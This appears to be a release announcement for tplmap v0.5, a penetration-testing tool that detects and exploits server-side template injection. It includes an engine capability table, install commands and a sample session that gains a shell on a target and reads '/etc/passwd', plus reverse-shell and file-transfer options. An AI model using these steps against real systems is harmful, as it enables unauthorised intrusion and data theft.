tplmap v0.5 releases: Code & Server-Side Template Injection Detection & Exploitation Tool
Tplmap
Tplmap assists the exploitation of Code Injection and Server-Side Template Injection vulnerabilities with a number of sandbox escape techniques to get access to the underlying operating system.
The tool and its test suite are developed to research the SSTI vulnerability class and to be used as an offensive security tool during web application penetration tests.
The sandbox break-out techniques came from James Kett’s Server-Side Template Injection: RCE For The Modern Web Appa and other public researchers [1] [2] and original works to extend this tool capabilities [3] [4].
It fully compromises the server exploiting several code context and blind injection scenarios. It also supports eval()-like code injections in Python, Ruby, PHP, Java and generic unsandboxed template engines.
Supported template engines
Tplmap supports over 15 template engines, unsandboxed template engines, and generic eval()-like injections.
Template engine | Remote Command Execution | Blind | Code evaluation | File read | File write |
---|---|---|---|---|---|
Mako | ✓ | ✓ | Python | ✓ | ✓ |
Jinja2 | ✓ | ✓ | Python | ✓ | ✓ |
Python (code eval) | ✓ | ✓ | Python | ✓ | ✓ |
Tornado | ✓ | ✓ | Python | ✓ | ✓ |
Nunjucks | ✓ | ✓ | JavaScript | ✓ | ✓ |
Jade | ✓ | ✓ | JavaScript | ✓ | ✓ |
doT | ✓ | ✓ | JavaScript | ✓ | ✓ |
Marko | ✓ | ✓ | JavaScript | ✓ | ✓ |
JavaScript (code eval) | ✓ | ✓ | JavaScript | ✓ | ✓ |
Dust (<= dustjs-helpers@1.5.0) | ✓ | ✓ | JavaScript | ✓ | ✓ |
EJS | ✓ | ✓ | JavaScript | ✓ | ✓ |
Ruby (code eval) | ✓ | ✓ | Ruby | ✓ | ✓ |
Slim | ✓ | ✓ | Ruby | ✓ | ✓ |
ERB | ✓ | ✓ | Ruby | ✓ | ✓ |
Smarty (unsecured) | ✓ | ✓ | PHP | ✓ | ✓ |
PHP (code eval) | ✓ | ✓ | PHP | ✓ | ✓ |
Freemarker | ✓ | ✓ | × | ✓ | ✓ |
Velocity | ✓ | ✓ | × | ✓ | ✓ |
Twig | × | × | × | × | × |
Smarty (secured) | × | × | × | × | × |
Dust (> dustjs-helpers@1.5.0) | × | × | × | × | × |
Changelog v.0.5
- Use stdout for prints to close #47
- Support Python3 to close #33
- Use Docker for testing environments
- Use TravisCI
- Fix Smarty caching quirks
- Add requirements.txt
- Fix Jinja2 false negatives
Installation
git clone https://github.com/epinna/tplmap.git
pip install -r requirements.txt
Exploitation
Tplmap is able to detect and exploit SSTI in a range of template engines to get access to the underlying file system and operating system. Run it against the URL to test if the parameters are vulnerable.
$ ./tplmap.py -u ‘http://www.target.com/page?name=John’
[+] Tplmap 0.3
Automatic Server-Side Template Injection Detection and Exploitation Tool[+] Testing if GET parameter ‘name’ is injectable
[+] Smarty plugin is testing rendering with tag ‘{*}’
[+] Smarty plugin is testing blind injection
[+] Mako plugin is testing rendering with tag ‘${*}’
…
[+] Jinja2 plugin is testing rendering with tag ‘{{*}}’
[+] Jinja2 plugin has confirmed injection with tag ‘{{*}}’
[+] Tplmap identified the following injection point:GET parameter: name
Engine: Jinja2
Injection: {{*}}
Context: text
OS: linux
Technique: render
Capabilities:Shell command execution: ok
Bind and reverse shell: ok
File write: ok
File read: ok
Code evaluation: ok, python code[+] Rerun tplmap providing one of the following options:
–os-shell Run shell on the target
–os-cmd Execute shell commands
–bind-shell PORT Connect to a shell bind to a target port
–reverse-shell HOST PORT Send a shell back to the attacker’s port
–upload LOCAL REMOTE Upload files to the server
–download REMOTE LOCAL Download remote files
Use –os-shell option to launch a pseudo-terminal on the target.
$ ./tplmap.py –os-shell -u ‘http://www.target.com/page?name=John’
[+] Tplmap 0.3
Automatic Server-Side Template Injection Detection and Exploitation Tool[+] Run commands on the operating system.
linux $ whoami
www
linux $ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
Demo
Suggest Reading:
- https://nvisium.com/blog/2016/03/09/exploring-ssti-in-flask-jinja2/
- https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/
Copyright (C) epinna
Source: https://github.com/epinna